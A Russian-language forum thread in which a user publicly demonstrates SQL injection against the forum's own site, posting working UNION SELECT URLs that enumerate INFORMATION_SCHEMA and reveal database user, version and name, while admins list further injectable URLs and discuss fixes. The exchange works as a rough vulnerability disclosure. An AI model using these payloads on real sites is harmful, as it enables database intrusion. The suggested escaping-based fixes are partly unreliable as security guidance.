fornit Jr. Poster Сообщений: 17 |
Наконец дотянулись руки доделать систему автохрюкинга  Идея запатентована Теперь каждый желающий может грохнуть этот сайт одним из двух предлагаемых способов. Если, к примеру, мама-папа-муж-жена не желает, чтобы сынок-дочка-жена-муж лазили здесь, достаточно хрюкнуть этот сайт, и любознательное существо останется без запретного яблока Мера своевременная, потому как самое интересное здесь еще впереди. |
|
Светлана Sr. Poster  Сообщений: 360  |
Николай И что же это за способы? 8) И зачем хрюкать сайт, когда он еще толком-то и не раскручен? |
|
Светлана Sr. Poster Сообщений: 360 |
Второй вопрос снимается с повестки дня. :D... Я слишком, иногда, тороплюсь с нажатием кнопки "Отправить" |
Род:  nan - админ Сообщений: 12275  |
Можно не бояться зайти на саму страничку автохрюкинга. Процесс пойдет только после нажатия одной из двух кнопок. |
|
Светлана Sr. Poster Сообщений: 360 |
Перспектива процесса автохрюкинга очень заманчива А восстановлению сайт подлежит после нажатия одной из кнопок? |
|
Род: Namor - админ Сообщений: 4  |
Опять меня стёрли. :'( Администрация, я буду жаловаться! Хрюкинг - клёвая штука. Хочу себе такую-же на сайт, и обращаюсь с официальным запросом к корпорации Fornitsoft о возможности лицензирования этой технологии. Я сначала думал что это такой способ отстрела неугодных юзеров (типа меня). А оказывается это способ суицида для них ??? Ну, в общем, хочу патент |
|
Род: nan - админ Сообщений: 12275 |
Я тебя не стирал!!! Ты так и торчишь от 22 марта в регистрации Roman-ом! Пароль забыл? Могу напомнить, если хочешь в письме! Насчет использования хрюкинга у тебя на сайте – никаких возражений. А нельзя ли попросить тебя в ответ сделать статейку для этого сайта о флеше в смысле программирования и т.д.? |
|
xssql Newbie Сообщений: 5 |
Вот пример ПряМоРУкОХрюКИНГА гагагага |
|
Род: nan - админ Сообщений: 12275 |
дешевая инъекция.. Нужно еще немало знать, чтобы навредить. Хотя бы именя таблиц. Ну а если кто-то сильно навредит, то в логах по его ip обращусь к провайдеру, найду голубчика о будет он сильно горевать в итоге. А сайт быстро восстановлю. Дырки всегда можно найти. Люди ходят по улице без шлемов и любой может кирпичем ударить. А пароль шифрованный :) Короче, каждый сам решает преступник он или нет. Воры, к примеру, в точности как хакеры, гордятся своим умением потрошить лохов. Хакер - ничем не лучше вора. Но спасибо, исправил защиту... |
|
xssql Newbie Сообщений: 5 |
ух как срашно )) давай, юзай, айпиха есть, я даже не через проксю юзал индж )) http://www.scorcher.ru/subject_index/subject_show.php?id=-4249/**/UNION/**/SELECT/**/0,concat_Ws(0x0b,table_name,column_name),2,3,4,5,6,7,8,9+FROM+INFORMATION_SCHEMA.COLUMNS+LIMIT+0,1 Перебирай лимитом все свои таблицы )) хотел бы навредить, поверь уже давно это сделал бы и тем более для тебя не кинул бы чтобы ты её латал )) "дешевая инъекция" а какая еще есть не дешевая индж? http://www.scorcher.ru/subject_index/subject_show.php?id=-4249/**/UnION/**/SELECT/**/0,concat_Ws(0x0b,user(),version(),database()),2,3,4,5,6,7,8,9 чел то что ты фильтр кинул тебе не поможет )) Надо сделать следующее if !is_numeric($_POST['id']) die('fuck off'); также когда не цифровое значение $id=addslashes($id); $id=htmlspecialchars($id); mysql_query(SELECT * FROM WHERE myid='$id'); обьязательно в запросах ставь ' и слешируй удачи |
|
Род: nan - админ Сообщений: 12275 |
все, сибо еще разок :) а че ты такой агрессивный?
|
|
xssql Newbie Сообщений: 5 |
с чего ты взял что я агрессивный )) я споконый как доска )) лан, кильни мой акк с сайта чтобы на мыло мессаги не приходили и проверь все переменные |
|
xssql Newbie Сообщений: 5 |
в этой теме ввел что надо тож есть баги, исправляй, подставляй ' там где цифры, буш баги видеть |
|
Айк - админ Сообщений: 3768 |
Туда же http://scorcher.ru/journal/show_news.php?id=' http://scorcher.ru/forum/index.php?board=7&action=display&threadid='&start=30 Как вариант, есть проги вроде xspider. Можно поставить копию сайта на локальную виртуальную машину и проверить с помощью сканера. Для функции mysql_query можно написать функцию обёртки, которая бы фильтровала запросы к БД и одновременно делала лог запросов, которые вызвали ошибку. Это самый простой, хоть и самый ненадёжный способ. Вторая вариация дубовых способов: фильтровать все GET/POST запросы на моменте первого обращения к PHP коду. Поскольку переменных, которые изменяются извне не так уж много, написать такой фильтр несложно и достаточно вставить его в одном месте, например config.php (setting.php) файле, лишь бы этот файл обязательно подключался к скриптам в самом начале. О дырах форума можно подробнее узнать по ссылке: securityvulns.ru В поиске ввести: "Yabb SE SQL Injection" или "Yabb SE exploit", "Yabb SE xss" Дабы не своровали FTP пароли, пока будешь лазить по таким сайтам, нужно установить Avira ( http://free-av.com ) и усердно молится
|
|
Род: oleg89 Full PosterСообщений: 63  |
удивляюсь нану - успевает и машеников разоблачать и хацкеров! и все один! помог бы кто, только обижают... он и так ради нас балбесов старается! |
|
Айк - админ Сообщений: 3768 |
На самом деле современная версия этого движка ( YaBB SE ==> SMF ) куда более устойчива ко взлому. Такого рода проблем там нет. |
|
Род: nan - админ Сообщений: 12275 |
Спасибо всем поучаствовавшим и посочувствовавшим :) форум написан с нуля, в нем нет ничего от Yabb кроме намеков :) только движок расширенного редактора - не мой. |
|
xssql Newbie Сообщений: 5 |
"удивляюсь нану - успевает и машеников разоблачать и хацкеров" я думаю если бы я индж не выложил врядли бы он узнал |
|
Род: oleg89 Full PosterСообщений: 63 |
не узнал бы, и в чем прикол? Вообще не вижу смысла ломать этот сайт. Он даже толком не раскручен... |